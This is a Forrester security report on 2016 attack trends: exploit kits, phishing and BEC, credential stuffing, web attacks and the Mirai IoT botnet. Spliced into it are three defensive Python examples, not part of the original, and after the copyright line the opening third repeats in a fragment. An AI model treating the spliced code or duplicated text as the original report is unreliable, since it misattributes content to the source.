For Security & Risk Professionals
Top Cybersecurity Threats In 2017
Landscape: The Security Architecture And Operations Playbook
January 26, 2017
By Josh Zelonis with Stephanie Balaouras, Bill Barringham, Peggy Dostie

Table of Contents

S&R Pros Must Understand And Adapt To The Threat Landscape


RECOMMENDATIONS
Ensure That You Follow The Core Tenets Of Zero Trust
Supplemental Material
Why read this report
Security and risk (S&R) pros have the challenging task of using finite budgets to protect their
business from every possible attack type in the threat landscape. One strategy for approaching
this challenge is to use historical attack trends to prioritize protections against attacks that are the
most highly probable. This paper analyzes common attack patterns responsible for breaches in
2016 to facilitate this approach.
Key Takeaways
Malware Infection Cycle Drives Attack Trends
Accounts are compromised, sites are compromised, emails are sent, all of which is building up to
getting traffic to an exploit kit. Whether it be ransomware, banking malware, or command and
control, understanding how this malware infects your network will help you build a better
defense.
Assume Account Compromise
The law of averages dictates that the majority of users on the internet have had their credentials
compromised. Poor password hygiene on the part of your users makes this your problem.
The Internet Of Things Has Been Weaponized
The last few months of 2016 have brought us a new and powerful threat. Many people felt that
DDoS protection had been commoditized until an IoT botnet knocked out a DNS provider. Be
ready for the coming storm.
S&R PROS MUST UNDERSTAND AND ADAPT TO THE
THREAT LANDSCAPE
According to Forrester's Global Business Technographics Security Survey, 2016, an eye-
opening 49% of global network security decision-makers report that they experienced at least
one breach during the past 12 months. Of these respondents, 55% had suffered some manner of
internal incident involving their own employee or third-party business partner. Internal incidents
can involve employees who simply make poor decisions regarding the handling and use of the
firm's sensitive data or employees who have malicious intent. These malicious insiders can also
work in concert with external threat actors. Fifty-six percent of firms that suffered at least one
breach did so at the hands of external threat actors. To help S&R pros better defend against these
external attacks, we will identify and analyze the top methods of infiltration ( see Figure 1 ).
Figure 1: Common Types Of External Attack

No. 1: Exploit Kits, Getting To The Soft, Chewy Center Since 2006
Exploit kits contain prewritten code that targets vulnerabilities in software. Cybercriminals use a
variety of methods to redirect users to a compromised server hosting the exploit kit. The exploit
kit scans the user's browser or system for vulnerabilities and delivers malware. In the threat
ecosystem, software exploits are the wheels that make the bus go 'round and 'round. For years,
network penetration testers have promoted the concept that an exploit is a tool that
cybercriminals use to compromise one of your perimeter devices, escalate privileges, and move
laterally through your network. However, it's not about perimeter devices, it's about software.
This teaches a lesson that we should have learned 15 years ago from malware such as Nimda and
Code Red: You need to patch your systems and teach users not to open attachments from
strangers. Malware has evolved, and today it's important that S&R pros understand the
relationship between traffic generators and exploit kits so you can defend against attacks that
bypass your perimeter ( see Figure 2 ):
What you need to know: Traffic shapers drive users to exploit kit operators. Traffic
shapers are the ad impression generators of the criminal underground, and they live and
die by their ability to intelligently drive traffic to malware and exploit kit operators.
These are extremely advanced players who use software such as KeitaroTDS, which has
the ability to fingerprint systems for antivirus products before redirecting traffic to the
exploit kit. (see endnote 1) Common vectors for driving traffic include paying for ad
impressions from legitimate advertising networks (AKA malvertising), compromising
legitimate systems to use as watering holes, and using stolen credentials to run spam
campaigns, a diversity of vectors that makes this extremely difficult and expensive to defend against.
What to do about it: Use threat intel with vulnerability management. As diverse as the
methods may be for gathering traffic, the entire business model behind ransomware and
credential-stealing malware such as Dridex relies on infection. This commonality is a
good place to start mounting your defenses. Combining threat intel to know what
vulnerabilities exploit kits are currently targeting, with a vulnerability management
solution that allows you to monitor which systems in your environment are vulnerable,
will put you in the driver's seat. In the case of ransomware, having a good backup and
recovery plan is also essential.
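The join this paragraph describes, combining a feed of CVEs that exploit kits are currently serving with a scan export of which hosts carry those CVEs, is shown below as an added example. It is not Forrester's code or any vendor's API: the feed rows, the scan findings, the host names and the CVE identifiers (CVE-EXAMPLE-*) are constructed placeholders, and the scoring weights are illustrative. The kit names RIG and Nuclear are the ones endnote 1 refers to.

```python
"""Join an exploit-kit threat-intel feed with vulnerability-scan findings.

Added example, not Forrester's code or any vendor's API. The feed, the scan
findings and the CVE identifiers are constructed for illustration; the kit
names RIG and Nuclear are the ones the report's endnote 1 mentions.
"""
from __future__ import annotations

from dataclasses import dataclass
from datetime import date


@dataclass(frozen=True)
class IntelEntry:
    """One row of a threat-intel feed: which kits are serving which CVE."""
    cve: str
    exploit_kits: tuple[str, ...]
    last_seen: date


@dataclass(frozen=True)
class Finding:
    """One row of a vulnerability-scan export."""
    host: str
    cve: str
    role: str  # "user-endpoint" or "server"


REPORT_DATE = date(2017, 1, 26)  # the "today" used for staleness checks

# Constructed feed: placeholder CVE ids, not real advisories.
INTEL_FEED = [
    IntelEntry("CVE-EXAMPLE-0001", ("RIG", "Nuclear"), date(2017, 1, 20)),
    IntelEntry("CVE-EXAMPLE-0002", ("RIG",), date(2016, 6, 1)),  # stale
]

# Constructed scan export for four hosts.
SCAN_FINDINGS = [
    Finding("wks-101", "CVE-EXAMPLE-0001", "user-endpoint"),
    Finding("srv-db-01", "CVE-EXAMPLE-0001", "server"),
    Finding("wks-102", "CVE-EXAMPLE-0002", "user-endpoint"),
    Finding("srv-web-01", "CVE-EXAMPLE-0003", "server"),
]


def active_kit_cves(feed, today, stale_days=30):
    """CVEs that a kit has served within the last `stale_days` days."""
    return {e.cve: e for e in feed if (today - e.last_seen).days <= stale_days}


def prioritize(findings, feed, today, stale_days=30):
    """Rank findings: in-kit CVEs first, user endpoints ahead of servers.

    Returns (score, finding, reason) tuples, highest score first. The weights
    are illustrative; the point is that the join decides the order rather
    than the raw severity number from the scanner.
    """
    active = active_kit_cves(feed, today, stale_days)
    ranked = []
    for f in findings:
        score, reasons = 0, []
        if f.cve in active:
            score += 10
            reasons.append("served by " + ", ".join(active[f.cve].exploit_kits))
        if f.role == "user-endpoint":
            # Browsers, mail clients and document readers are the kit's entry point.
            score += 3
            reasons.append("user endpoint")
        ranked.append((score, f, "; ".join(reasons) or "no current kit activity"))
    ranked.sort(key=lambda r: (-r[0], r[1].host))
    return ranked


def patch_order(findings, feed, today, stale_days=30):
    """Host names in the order the patch team should work them."""
    return [f.host for _, f, _ in prioritize(findings, feed, today, stale_days)]


if __name__ == "__main__":
    for score, f, why in prioritize(SCAN_FINDINGS, INTEL_FEED, REPORT_DATE):
        print(f"{score:3d}  {f.host:<11} {f.cve:<17} {why}")
```

With the constructed data, the workstation carrying the CVE that RIG and Nuclear are serving lands at the top, the server with the same CVE comes second, and the host whose CVE left the kits months ago drops below both, which is the ordering the paragraph argues for.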
Figure 2: The Use Of Exploit Kits In Criminal Enterprise

No. 2: Social Engineering Demonstrates It's Just Easier To Attack Human Insecurity
Two of the biggest attack vectors we saw in 2016 were phishing attacks and business email
compromise (BEC). One of the reasons social engineering is so effective is that it preys on
human psychology. Factoring in the wealth of information people post on social media,
adversaries have everything they need to perform open source intelligence (OSINT) on us to
determine our likes and dislikes, job history, and relationship information, before leveraging it
against us. (see endnote 2) One example of an adversary doing just this was the Anthem breach,
where the attackers used LinkedIn profiles to identify high-value targets for phishing as the first
phase of the attack: (see endnote 3)
What you need to know: Users are quick to succumb to phishing and BEC attacks.
According to one study, 74% of targeted attack attempts use email as a vector. (see
endnote 4) This isn't 2000 where attackers own mail clients as soon as a user opens an
email, but it might as well be. The 2016 Verizon Data Breach Investigations Report
tracked over 8 million phishing simulations and found that 13% of recipients not only
opened the email but went on to click links or open attachments that would guarantee
infection. (see endnote 5) It's not just phishing attacks that use email as a threat vector.
BEC is a form of social engineering that follows the general story arc of someone posing
as the CEO who asks an employee to pay an invoice, and the helpful employee goes
about doing it. The United States Federal Bureau of Investigation estimates that BEC has
cost companies $3.1 billion between October 2013 and May 2016, when the report was
published. (see endnote 6)
What to do about it: Train employees to spot these attacks. Education and phishing
simulations may help raise user awareness to reduce the effectiveness of phishing
campaigns, but experience shows that this isn't a total solution. Understanding that this
class of attack targets an individual, you also need to harden business processes for
transactions involving money or critical data to empower your staff to ask questions and
eliminate this risk.
No. 3: Credential Stuffing, Or How Someone Else's Breach Hurts You
There are approximately 3.5 billion internet users worldwide. (see endnote 7) As the number of
internet users has grown, so too has the scale of data breaches: Many breaches of the past several
years broke the 100 million customer record barrier (e.g., Home Depot, Yahoo). In the case of
Yahoo, which suffered a compromise of 1 billion customer records, that's over 28%, almost one-
third of all internet users. (see endnote 8) The majority of people on the internet have had their
credentials compromised at least once. Here's the stark reality: Dropbox was compromised with
an employee's credentials that attackers had stolen in a LinkedIn breach: (see endnote 9)
What you need to know: Stolen credentials represent a reputational risk to you. There are
a number of ways cybercriminals can monetize stolen credentials that aren't immediately
obvious. Loyalty fraud is becoming extremely popular and profitable, with 72% of
loyalty program managers reporting fraud-related issues. (see endnote 10) According to
The Points Guy, points are worth a cent or two each, and one can cash them out for
anything from gift cards to resort stays. (see endnote 11) The fact that it's a lot easier to
launder points than money stolen from banking fraud makes this an attractive business
model. Unfortunately, this could turn your loyalty program into a customer experience
nightmare.
What to do about it: Incorporate threat intel with user behavior analytics. There are
essentially two challenges that phishers/spammers have to overcome: They have to hit
your inbox and then get a click. An established identity and reputation are two key factors
marketing firms use to get their messages into your inbox. By leveraging compromised
accounts, criminals are playing the same game with less restraint. Companies like
Emailage and Threatmetrix attempt to help the enterprise by developing user reputation
scores based on everything from account age to social media score. The problem is that
the subset of users who have suffered a breach of their information is so high that S&R
pros need to understand that the account is not necessarily the same user ( see Figure 3 ).
Thus, it's important to use technologies such as security user behavior analytics to
monitor for suspicious activity. (see endnote 12)
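The two signals this paragraph points at, a source that walks many accounts with a high failure rate and a successful login that means "the account is not the same user", are implemented below over constructed authentication log lines as an added example. It is not Forrester's code and not any SUBA vendor's logic; the log format, the user names, the per-user history of known source addresses and the thresholds are all assumptions, and the IP addresses are from the RFC 5737 documentation ranges.

```python
"""Credential-stuffing detection over authentication log lines.

Added example, not Forrester's code and not any SUBA vendor's logic. The log
format and the lines below are constructed; addresses come from the
RFC 5737 documentation ranges.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$"
)

# Constructed sample: one source walks a list of usernames in seconds and
# lands one success; a regular user logs in from her usual address.
SAMPLE_LOG = """\
2016-11-03T10:00:01Z src=203.0.113.5 user=alice result=FAIL
2016-11-03T10:00:02Z src=203.0.113.5 user=bob result=FAIL
2016-11-03T10:00:03Z src=203.0.113.5 user=carol result=OK
2016-11-03T10:00:04Z src=203.0.113.5 user=dave result=FAIL
2016-11-03T10:00:05Z src=203.0.113.5 user=erin result=FAIL
2016-11-03T10:00:06Z src=203.0.113.5 user=frank result=FAIL
2016-11-03T10:00:07Z src=203.0.113.5 user=grace result=FAIL
2016-11-03T10:01:00Z src=198.51.100.7 user=alice result=OK
2016-11-03T10:02:00Z src=198.51.100.7 user=alice result=FAIL
"""

# Constructed per-account history of source addresses previously seen.
KNOWN_SOURCES = {"alice": {"198.51.100.7"}, "carol": {"198.51.100.9"}}


def parse(lines):
    """Yield dicts for well-formed lines; skip anything that does not match."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            e = m.groupdict()
            e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
            yield e


def flag_stuffing_sources(events, window=timedelta(minutes=5),
                          min_users=5, min_fail_rate=0.8):
    """Source addresses that try many distinct accounts and mostly fail.

    A user mistyping a password hits one account; a stuffing run walks a
    breached list, so distinct-user count and failure rate together are the
    signal. Returns the strongest qualifying window per address.
    """
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    flagged = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda ev: ev["ts"])
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            win = evs[start:end + 1]
            users = {ev["user"] for ev in win}
            fails = sum(ev["result"] == "FAIL" for ev in win)
            if len(users) >= min_users and fails / len(win) >= min_fail_rate:
                best = flagged.get(ip)
                if best is None or len(users) > best["distinct_users"]:
                    flagged[ip] = {"distinct_users": len(users),
                                   "attempts": len(win), "failures": fails}
    return flagged


def accounts_to_review(events, flagged, known_sources):
    """Successful logins from a flagged address the account has never used.

    The password was right, so the login succeeded, but the source is a
    stuffing run: the account is not necessarily the same user.
    """
    hits = []
    for e in events:
        if (e["result"] == "OK" and e["ip"] in flagged
                and e["ip"] not in known_sources.get(e["user"], set())):
            hits.append((e["user"], e["ip"]))
    return hits


def analyze(log_text, known_sources):
    events = list(parse(log_text.splitlines()))
    flagged = flag_stuffing_sources(events)
    return flagged, accounts_to_review(events, flagged, known_sources)


if __name__ == "__main__":
    flagged, review = analyze(SAMPLE_LOG, KNOWN_SOURCES)
    for ip, stats in flagged.items():
        print("stuffing source", ip, stats)
    for user, ip in review:
        print("review account", user, "login from", ip)
```

On the sample, the single source that tried seven accounts in six seconds is flagged, and carol's successful login from it is the one to treat as a compromised account rather than a normal session. The thresholds are where real tuning happens: shared NAT addresses and single-sign-on gateways legitimately carry many users from one IP, so in production the distinct-user threshold is usually set per source class rather than globally.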
Figure 3: Top Breaches As A Percentage Of Worldwide Internet Users

No. 4: The Web Application Paradigm


Web application attacks are a major part of the malware ecosystem we described earlier. Traffic
distribution networks require legitimate traffic to route and somewhere to host the exploit kit.
Your site may be attractive for indirect reasons you haven't yet thought of:
What you need to know: You are infecting your customers right now. In 1984, Ken
Thompson wrote a paper titled "Reflections on Trusting Trust" detailing the risk of
trusting third-party code. (see endnote 13) These days, we're loading remote JavaScript
libraries, trackers, and fonts, and then trusting ad companies to provide safe content for
our users. You need to be accountable for everything you load when a visitor comes to
your site. The New York Times, BBC, MSN, Xfinity, and the NFL have all been hit with
malvertising campaigns, becoming infection vectors for their customers. (see endnote 14)
In the future, expect cybercriminals to combine the same strategy behind malvertising
with strategic compromises of sites hosting other code you are loading to turn your site
into a watering hole. For years, we have implored organizations to stop loading code
from remote websites. Now is the time to stop.
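Being "accountable for everything you load" starts with knowing what that is. The script below, an added example that is not Forrester's code, parses a page and lists every script, stylesheet, frame and image fetched from a host other than your own, marking each as allowed or unreviewed against an allowlist your review process maintains. The HTML, the host names (reserved example domains) and the allowlist are constructed for the example.

```python
"""Inventory of remote resources a page loads, checked against an allowlist.

Added example, not Forrester's code. The HTML below and the host names in
it are constructed (reserved example domains); the allowlist stands in for
whatever your own review process has signed off on.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class RemoteLoadCollector(HTMLParser):
    """Collect (tag, url) for every element that fetches and runs or renders
    remote content: scripts, stylesheets/preloads, frames and images."""
    TAG_ATTRS = {"script": "src", "link": "href", "iframe": "src", "img": "src"}
    LINK_RELS = {"stylesheet", "preload", "modulepreload", "prefetch"}

    def __init__(self):
        super().__init__()
        self.loads = []

    def handle_starttag(self, tag, attrs):
        attr = self.TAG_ATTRS.get(tag)
        if attr is None:
            return
        a = dict(attrs)
        url = a.get(attr)
        if not url:
            return
        rels = set((a.get("rel") or "").lower().split())
        if tag == "link" and not (rels & self.LINK_RELS):
            return  # canonical, alternate, icon etc. neither execute nor style
        self.loads.append((tag, url))


def third_party_loads(html, page_host, allowlist):
    """Return (tag, host, status) for every load from a host other than ours."""
    collector = RemoteLoadCollector()
    collector.feed(html)
    report = []
    for tag, url in collector.loads:
        host = urlsplit(url).hostname or ""  # "" for relative URLs
        if not host or host == page_host:
            continue  # same-origin content is ours to audit separately
        allowed = host in allowlist or any(host.endswith("." + h) for h in allowlist)
        report.append((tag, host, "allowed" if allowed else "UNREVIEWED"))
    return report


def unreviewed_hosts(report):
    """Distinct hosts that nobody has signed off on, for the review queue."""
    return sorted({host for _, host, status in report if status == "UNREVIEWED"})


# Constructed page served from example.com.
SAMPLE_HTML = """
<html><head>
<link rel="canonical" href="https://example.com/article">
<link rel="stylesheet" href="https://fonts.example.org/css?family=Sans">
<script src="/js/app.js"></script>
<script src="https://cdn.example.net/lib/v1/lib.min.js"></script>
<script src="//ads.example-tracker.invalid/tag.js"></script>
</head><body>
<img src="https://example.com/img/logo.png">
<iframe src="https://ads.example-tracker.invalid/frame"></iframe>
</body></html>
"""
ALLOWLIST = {"cdn.example.net"}

if __name__ == "__main__":
    for row in third_party_loads(SAMPLE_HTML, "example.com", ALLOWLIST):
        print(*row)
```

Note the protocol-relative `//ads...` script: it is just as remote as an `https://` one, and `urlsplit` resolves its host correctly. Running this over rendered pages in CI, and failing the build on any unreviewed host, turns the paragraph's advice into a gate rather than an aspiration.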
What you need to do about it: Like polio, it's time to eradicate SQL injection. SQL
injection, a pernicious web application attack, allows remote command execution and
exfiltration of the contents of your database via your web application. Unfortunately,
SQL injection is still responsible for almost half of all web attacks detected by Akamai.
(see endnote 15) There is a solution that is 100% effective in the prevention of SQL
injection; security pros must ensure that app developers use prepared statements, which
handle user input as a parameter instead of a dynamic part of a SQL statement. DevOps
methodologies are increasing the pace of app releases, straining security teams at a time
when their expertise is already scarce. Security pros must join with developers and
operations pros in DevOps practices or lose out on the opportunity to systematically
improve application security. (see endnote 16)
No. 5: Cybercriminals Have Weaponized The Internet Of Things (IoT)
Gone are the days of mom and pop botnets consisting of unpatched AOL users. There was a
major escalation in the DDoS arms race this year as cybercriminals released code for Mirai, an
IoT worm, after a record-breaking proof of capability against Brian Krebs' blog site. (see endnote
17) Cybercriminals have continuously iterated on this same code and used it in increasingly
damaging attacks in the last few months of 2016 ( see Figure 4 ). (see endnote 18) We are now
living in the dystopian IoT future we have feared:
What you need to know: Mirai is a fully armed and operational DDoS battle station.
Initial variants of Mirai relied on a default credential list to access security cameras and
digital video recorders (DVRs), but cybercriminals have armed the latest variant with
exploit code targeting home DSL routers. (see endnote 19) This is significant because it's
the start of a trend toward more-sophisticated attacks, which greatly increases the number
of devices that they can infect. Keep in mind that for all its destructive capabilities, Mirai
is still the little cousin to Bashlight, which is known to have infected about a million
devices. (see endnote 20) Developments such as this are only one sign of things to come
as cybercriminals have made significant investments into infrastructure to add resilience
to this dangerous botnet. (see endnote 21)
What you need to do: Prepare for IoT ransomware. In August, security researchers
demonstrated a ransomware strain that attacked an IoT thermostat, turning the
temperature up to 99 degrees Fahrenheit and locking the device with a cryptocode. (see
endnote 22) While traditional ransomware is an extortion play based on denying the user
access to their data, IoT offers a lot of new and exciting opportunities for making your
targets miserable and putting them in physical harm. As people are exploring the
potential for ransomware targeting vehicles, operational technologies, and even medical
equipment, it's essential to have a plan for how your organization will resolve these
issues. One challenge to IoT devices is you can't load traditional endpoint protections on
them due to device constraints. Look to leverage Zero Trust to segment and limit the IoT
attack surface. (see endnote 23)
Figure 4: The Mirai 2016 Timeline

RECOMMENDATIONS
Ensure That You Follow The Core Tenets Of Zero Trust
Zero Trust is a fundamental rethinking of corporate security from a failed, perimeter-centric
approach to one that is data-centric and more appropriate for digital businesses (where S&R pros
have far less control over networks, endpoints, IoT devices, apps, and people). Three concepts
underpin Zero Trust. S&R pros must: 1) verify and secure all resources and data assets regardless
of location; 2) limit and strictly enforce access control across all user populations,
devices/channels, and hosting models; and 3) continuously log and inspect all traffic, both
internal and external. Heading into 2017, we recommend that S&R pros:
Ensure your vulnerability management solution provides endpoint visibility. To
understand risk exposure, it's not enough to perform external scans of systems,
particularly user systems. Attackers aren't gaining access through exposed network
services, but through the software your users read email, surf the web, and open
documents with.
Employ user behavior analytics algorithms to your customer base for fraud detection. In a
world rife with password reuse and frequent data breaches, credential stuffing is an
immediate concern. You need to be able to detect when good users suddenly go bad as an
indication of compromise in order to limit financial and reputational damage.
Make sure you're covered for DDoS. There's been major escalation in DDoS capabilities,
and your current coverage may no longer be sufficient in this new age of IoT botnets.
Review your DDoS mitigation strategies, and talk to critical third-party service providers
to ensure they're prepared as well.
SUPPLEMENTAL MATERIAL
Survey Methodology
Forrester collaborated with CyberFactors to obtain the data in this report. The data may contain
publicly available information and/or proprietary data collected by CyberFactors. The analysis of
the data is exclusively Forrester's. More information about CyberFactors is available at
cyberfactors.com.
Forrester's Global Business Technographics Security Survey, 2016, was fielded in March to May
2016. This online survey included 3,588 respondents in Australia, Brazil, Canada, China, France,
Germany, India, New Zealand, the UK, and the US from companies with two or more
employees.
Forrester's Business Technographics ensures that the final survey population contains only those
with significant involvement in the planning, funding, and purchasing of business and
technology products and services. Research Now fielded this survey on behalf of Forrester.
Survey respondent incentives include points redeemable for gift certificates.
ENDNOTES
1. Source: Ed Miles, "A Case Of Keitaro (featuring RIG And Nuclear)," Zscaler blog, February 29, 2016 (http://www.zscaler.com/blogs/research/case-keitaro-featuring-rig-and-nuclear).
2. See the Forrester report "Four Ways Cybercriminals Exploit Social Media."
3. Source: Joanna Belbey, "Beware Of Social Media And Cybersecurity," Forbes, February 29, 2016 (http://www.forbes.com/sites/joannabelbey/2016/02/29/beware-of-social-media-and-cybersecurity/2/#7c14499a182a).
4. Source: "Spear Phishing 101: What is Spear Phishing?" Trend Micro, September 24, 2015 (http://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/spear-phishing-101-what-is-spear-phishing).
5. Source: "Verizon's 2016 Data Breach Investigations Report," Verizon, 2016 (http://www.verizonenterprise.com/verizon-insights-lab/dbir/2016/).
6. Source: "Business E-Mail Compromise: The 3.1 Billion Dollar Scam," Internet Crime Complaint Center, June 14, 2016 (http://www.ic3.gov/media/2016/160614.aspx).
7. Source: "Internet Users," Internet Live Stats (http://www.internetlivestats.com/internet-users/).
8. Source: Robert McMillan, Ryan Knutson, and Deepa Seetharaman, "Yahoo Discloses New Breach of 1 Billion User Accounts," The Wall Street Journal, December 15, 2016 (http://www.wsj.com/articles/yahoo-discloses-new-breach-of-1-billion-user-accounts-1481753131).
9. Source: Kate Conger and Matthew Lynley, "Dropbox employee's password reuse led to theft of 60M+ user credentials," TechCrunch, August 30, 2016 (http://techcrunch.com/2016/08/30/dropbox-employees-password-reuse-led-to-theft-of-60m-user-credentials/).
10. Source: Mike McDonnell, "Loyalty Fraud: A Rising Threat to Consumers and Businesses," 1to1 Media blog, March 11, 2016 (http://www.1to1media.com/customer-loyalty/loyalty-fraud-rising-threat-consumers-and-businesses).
11. Source: "What Are Points & Miles Worth? November Monthly Valuations," The Points Guy, November 2, 2016 (http://thepointsguy.com/2016/11/november-2016-monthly-valuations).
12. See the Forrester report "Vendor Landscape: Security User Behavior Analytics (SUBA)."
13. Source: Ken Thompson, "Reflections on trusting trust," ACM Digital Library, August 8, 1984 (http://dl.acm.org/citation.cfm?id=358210).
14. Source: Jérôme Segura, "Large Angler Malvertising Campaign Hits Top Publishers," Malwarebytes Labs, March 15, 2016 (http://blog.malwarebytes.com/threat-analysis/2016/03/large-angler-malvertising-campaign-hits-top-publishers).
15. Source: "Q3 State of the Internet / Security Report," Akamai (http://content.akamai.com/pg7407-soti-security-report-q3-en.html).
16. See the Forrester report "Secure Applications At The Speed Of DevOps."
17. Source: Brian Krebs, "Source Code for IoT Botnet 'Mirai' Released," Krebs on Security, October 16, 2016 (https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/).
18. Source: Waqas Amir, "Akamai Kicks off Brian Krebs from its network after 665 Gbps DDoS attack," HackRead, September 23, 2016 (http://www.hackread.com/brian-krebs-665-gbps-ddos-attack-akamai/); Eduard Kovacs, "Hosting Provider OVH Hit by 1 Tbps DDoS Attack," SecurityWeek, September 23, 2016 (http://www.securityweek.com/hosting-provider-ovh-hit-1-tbps-ddos-attack); Brian Krebs, "Source Code for IoT Botnet 'Mirai' Released," Krebs on Security, October 16, 2016 (https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/); Scott Hilton, "Dyn Analysis Summary Of Friday October 21 Attack," Dyn, October 26, 2016 (https://dyn.com/blog/dyn-analysis-summary-of-friday-october-21-attack/); Kevin Beaumont, "'Shadows Kill' Mirai DDoS botnet testing large scale attacks, sending threatening messages about UK and attacking researchers," Medium, November 3, 2016 (https://medium.com/@networksecurity/shadows-kill-mirai-ddos-botnet-testing-large-scale-attacks-sending-threatening-messages-about-6a61553d1c7#.3ief6l178); "Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)," Exploit Database, November 8, 2016 (https://www.exploit-db.com/exploits/40740/); Dan Goodin, "Newly discovered router flaw being hammered by in-the-wild attacks," Ars Technica, November 29, 2016 (http://arstechnica.com/security/2016/11/notorious-iot-botnets-weaponize-new-flaw-found-in-millions-of-home-routers/); Graeme Burton, "TalkTalk and Post Office routers downed in Mirai botnet attack," The Inquirer, December 2, 2016 (http://www.theinquirer.net/inquirer/news/2478916/talktalk-and-post-office-routers-downed-in-mirai-botnet-attack); Liu Ya, "Now Mirai Has DGA Feature Built in," Network Security Research Lab at 360, December 9, 2016 (http://blog.netlab.360.com/new-mirai-variant-with-dga/); and Catalin Cimpanu, "Security Firms Almost Brought Down Massive Mirai Botnet," BleepingComputer, December 16, 2016 (http://www.bleepingcomputer.com/news/security/security-firms-almost-brought-down-massive-mirai-botnet/).
19. Source: John Leyden, "Sh... IoT just got real: Mirai botnet attacks targeting multiple ISPs," The Register, December 2, 2016 (http://www.theregister.co.uk/2016/12/02/broadband_mirai_takedown_analysis/).
20. Source: Dan Goodin, "Brace yourselves: source code powering potent IoT DDoSes just went public," Ars Technica, October 3, 2016 (http://arstechnica.com/security/2016/10/brace-yourselves-source-code-powering-potent-iot-ddoses-just-went-public/).
21. Source: Brian Krebs, "New Mirai Worm Knocks 900K Germans Offline," Krebs on Security, November 16, 2016 (http://krebsonsecurity.com/2016/11/new-mirai-worm-knocks-900k-germans-offline/).
22. Source: Darlene Storm, "Hackers demonstrated first ransomware for IoT thermostats at DEF CON," Computerworld, August 8, 2016 (http://www.computerworld.com/article/3105001/security/hackers-demonstrated-first-ransomware-for-iot-thermostats-at-def-con.html).
23. See the Forrester report "The IoT Attack Surface Transcends The Digital-Physical Divide."
© 2017, Forrester Research, Inc. and/or its subsidiaries. All rights reserved.
onals
Top Cybersecurity Threats In 2017
Landscape: The Security Architecture And Operations Playbook
January 26, 2017
By Josh Zelonis with Stephanie Balaouras , Bill Barringham , Peggy Dostie

Table of Contents

S&R Pros Must Understand And Adapt To The Threat Landscape


RECOMMENDATIONS
Ensure That You Follow The Core Tenets Of Zero Trust
Supplemental Material
Why read this report
Security and risk (S&R) pros have the challenging task of using finite budgets to protect their
business from every possible attack type in the threat landscape. One strategy for approaching
this challenge is to use historical attack trends to prioritize protections against attacks that are the
most highly probable. This paper analyzes common attack patterns responsible for breaches in
2016 to facilitate this approach.
Key Takeaways
Malware Infection Cycle Drives Attack Trends
Accounts are compromised, sites are compromised, emails are sent, all of which is building up to
getting traffic to an exploit kit. Whether it be ransomware, banking malware, or command and
control, understanding how this malware infects your network will help you build a better
defense.
Assume Account Compromise
The law of averages dictates that the majority of users on the internet have had their credentials
compromised. Poor password hygiene on the part of your users makes this your problem.
The Internet Of Things Has Been Weaponized
The last few months of 2016 have brought us a new and powerful threat. Many people felt that
DDoS protection had been commoditized until an IoT botnet knocked out a DNS provider. Be
ready for the coming storm.
S&R PROS MUST UNDERSTAND AND ADAPT TO THE
THREAT LANDSCAPE
According to Forrester's Global Business Technographics Security Survey, 2016, an eye-
opening 49% of global network security decision-makers report that they experienced at least
one breach during the past 12 months. Of these respondents, 55% had suffered some manner of
internal incident involving their own employee or third-party business partner. Internal incidents
can involve employees who simply make poor decisions regarding the handling and use of the
firm's sensitive data or employees who have malicious intent. These malicious insiders can also
work in concert with external threat actors. Fifty-six percent of firms that suffered at least one
breach did so at the hands of external threat actors. To help S&R pros better defend against these
external attacks, we will identify and analyze the top methods of infiltration ( see Figure 1 ).
Figure 1: Common Types Of External Attack

No. 1: Exploit Kits, Getting To The Soft, Chewy Center Since 2006
Exploit kits contain prewritten code that targets vulnerabilities in software. Cybercriminals use a
variety of methods to redirect users to a compromised server hosting the exploit kit. The exploit
kit scans the user's browser or system for vulnerabilities and delivers malware. In the threat
ecosystem, software exploits are the wheels that make the bus go 'round and 'round. For years,
network penetration testers have promoted the concept that an exploit is a tool that
cybercriminals use to compromise one of your perimeter devices, escalate privileges, and move
laterally through your network. However, it's not about perimeter devices, it's about software.
This teaches a lesson that we should have learned 15 years ago from malware such as Nimda and
Code Red: You need to patch your systems and teach users not to open attachments from
strangers. Malware has evolved, and today it's important that S&R pros understand the
relationship between traffic generators and exploit kits so you can defend against attacks that
bypass your perimeter ( see Figure 2 ):
What you need to know: Traffic shapers drive users to exploit kit operators. Traffic
shapers are the ad impression generators of the criminal underground, and they live and
die by their ability to intelligently drive traffic to malware and exploit kit operators.
These are extremely advanced players who use software such as KeitaroTDS, which has
the ability to fingerprint systems for antivirus products before redirecting traffic to the
exploit kit. (see endnote 1) Common vectors for driving traffic include paying for ad
impressions from legitimate advertising networks (AKA malvertizing), compromising
legitimate systems to use as watering holes, and using stolen credentials to run spam
campaigns, which makes it extremely difficult and expensive to defend against.
What to do about it: Use threat intel with vulnerability management. As diverse as the
methods may be for gathering traffic, the entire business model behind ransomware and
credential-stealing malware such as Dridex relies on infection. This commonality is a
good place to start mounting your defenses. Combining threat intel to know what
vulnerabilities exploit kits are currently targeting, with a vulnerability management
solution that allows you to monitor which systems in your environment are vulnerable,
will put you in the driver's seat. In the case of ransomware, having a good backup and
recovery plan is also essential.
Figure 2: The Use Of Exploit Kits In Criminal Enterprise

No. 2: Social Engineering Demonstrates It's Just Easier To Attack Human Insecurity
Two of the biggest attack vectors we saw in 2016 were phishing attacks and business email
compromise (BEC). One of the reasons social engineering is so effective is that it preys on
human psychology. Factoring in the wealth of information people post on social media,
adversaries have everything they need to perform open source intelligence (OSINT) on us to
determine our likes and dislikes, job history, and relationship information, before leveraging it
against us. (see endnote 2) One example of an adversary doing just this was the Anthem breach,
where the attackers used LinkedIn profiles to identify high-value targets for phishing as the first
phase of the attack: (see endnote 3)
What you need to know: Users are quick to succumb to phishing and BEC attacks.
According to one study, 74% of targeted attack attempts use email as a vector. (see
